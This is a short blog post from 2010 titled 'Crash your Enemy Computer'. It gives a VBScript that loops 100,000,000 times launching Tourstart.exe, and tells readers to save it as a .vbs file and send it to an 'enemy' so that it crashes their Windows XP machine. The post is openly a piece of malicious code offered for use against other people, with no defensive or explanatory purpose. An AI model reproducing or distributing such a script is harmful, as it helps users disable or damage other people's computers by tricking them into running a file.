Pages

Nov 20, 2010

Crash your Enemy Computer

USE THIS ON YOUR OWN RESPONSIBILITY
This Will Crash Your enemy Computer

Copy this Code and Past into Notepad

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

Save It As Anything.vbs and send it to your enemy.never double-click this file in your computer..
It Only Works With Windows XP


Source

No comments:

Post a Comment